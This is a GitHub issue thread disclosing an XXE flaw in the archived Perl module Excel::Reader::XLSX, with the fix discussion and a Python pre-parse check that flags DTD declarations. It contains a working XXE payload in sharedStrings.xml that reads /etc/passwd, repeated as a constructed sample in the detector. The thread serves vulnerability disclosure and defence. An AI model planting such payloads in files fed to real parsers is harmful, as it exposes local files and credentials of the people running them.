This repository has been archived by the owner on Dec 28, 2023. It is now read-only.

XXE injection is possible via specially crafted excel file #10

Closed
luc-lynx opened this issue Oct 12, 2016 · 6 comments

@luc-lynx

The module is vulnerable to XXE injection that allows reading local files, making network requests, etc.

How to reproduce the issue:

  1. Add XXE payload to xl/sharedStrings.xml like in the attached file

```xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [ <!ELEMENT t ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&xxe;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst>
```

  2. Run example from README.md:

```perl
use strict;
use warnings;
use Excel::Reader::XLSX;

my $reader = Excel::Reader::XLSX->new();
my $workbook = $reader->read_file( 'test2.xlsx' );

if ( !defined $workbook ) {
    die $reader->error(), "\n";
}

for my $worksheet ( $workbook->worksheets() ) {

    my $sheetname = $worksheet->name();

    print "Sheet = $sheetname\n";

    while ( my $row = $worksheet->next_row() ) {

        while ( my $cell = $row->next_cell() ) {

            my $row   = $cell->row();
            my $col   = $cell->col();
            my $value = $cell->value();

            print "  Cell ($row, $col) = $value\n";
        }
    }
}
```

As a result you'll see the content of your local /etc/passwd file

test2.xlsx

@luc-lynx luc-lynx changed the title XXE injection in documents XXE injection is possible via specially crafted excel file Oct 12, 2016
@jmcnamara
Owner

jmcnamara commented Oct 12, 2016

Hi Evgeny,

Thanks for highlighting that vulnerability.

Just to note that this project was never released to CPAN, hasn't been worked on since April 2012, and is effectively abandoned. There are maintained solutions such as Spreadsheet::ParseXLSX that people should be using instead.

John

@luc-lynx
Author

Hi John,

Thanks for the clarification. I just came across the bug in several projects that were using this module for xlsx processing. Just wanted to leave the report here for those who will possibly use the code, as a reminder that they will need to fix the issue themselves.

Evgeny

@jmcnamara
Owner

Thanks.

Is there a workaround for this issue?

@luc-lynx
Author

luc-lynx commented Oct 14, 2016

It should be something like

```perl
my $xml_reader = XML::LibXML::Reader->new(
    location        => $filename,
    load_ext_dtd    => 0,
    expand_entities => 0,
    no_blanks       => 1,
    no_network      => 1
);
```

during XML parser init. Sure, I can send a PR, but it'll take some time because I'm not a Perl developer at all =)
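
A pre-parse check for code that still feeds untrusted .xlsx files to an unpatched copy of the module, added here as an example that is not part of the thread or of the project's code: it flags any XML part that declares a DOCTYPE, which a spreadsheet's parts have no need for. The function names, the size cap and the sample package are assumptions constructed for illustration.

```python
import io
import zipfile
import xml.parsers.expat

NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
MAX_PART_BYTES = 50 * 1024 * 1024  # assumed cap on a part's declared size


class DoctypeFound(Exception):
    """Raised on the DOCTYPE itself, before any entity declaration is read."""


def _on_doctype(name, system_id, public_id, has_internal_subset):
    raise DoctypeFound(name)


def suspect_parts(xlsx_bytes):
    """Return names of XML parts that declare a DTD, are malformed or oversized."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as package:
        for info in package.infolist():
            if not info.filename.lower().endswith((".xml", ".rels")):
                continue
            if info.file_size > MAX_PART_BYTES:
                flagged.append(info.filename)
                continue
            parser = xml.parsers.expat.ParserCreate()
            parser.StartDoctypeDeclHandler = _on_doctype
            try:
                parser.Parse(package.read(info), True)
            except (DoctypeFound, xml.parsers.expat.ExpatError):
                flagged.append(info.filename)
    return flagged


def build_sample(shared_strings_xml):
    """Constructed two-part package, enough for the check (not a full workbook)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as package:
        package.writestr("xl/workbook.xml", f'<workbook xmlns="{NS}"/>')
        package.writestr("xl/sharedStrings.xml", shared_strings_xml)
    return buf.getvalue()


CLEAN = f'<sst xmlns="{NS}"><si><t>testA2</t></si></sst>'
# Constructed sample with the same shape as the sharedStrings.xml in the report.
WITH_DTD = ('<!DOCTYPE foo [ <!ELEMENT t ANY > '
            '<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>'
            f'<sst xmlns="{NS}"><si><t>&xxe;</t></si></sst>')
```

Files for which `suspect_parts` returns a non-empty list can be rejected or quarantined before they reach the spreadsheet reader.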

jmcnamara added a commit that referenced this issue Oct 17, 2016
@jmcnamara
Owner

I've pushed a fix for this to master. If you encounter users with this vulnerability you can ask them to upgrade or better still to use a supported module.

Either way, thank you for the report.

@SaFiSec

SaFiSec commented May 10, 2021

@luc-lynx Where to add this payload in Excel files? Kindly make a video for it. Using Linux LibreOffice. Also other Office files: Word, PP, etc.

xlat added a commit to xlat/excel-reader-xlsx that referenced this issue Jun 2, 2021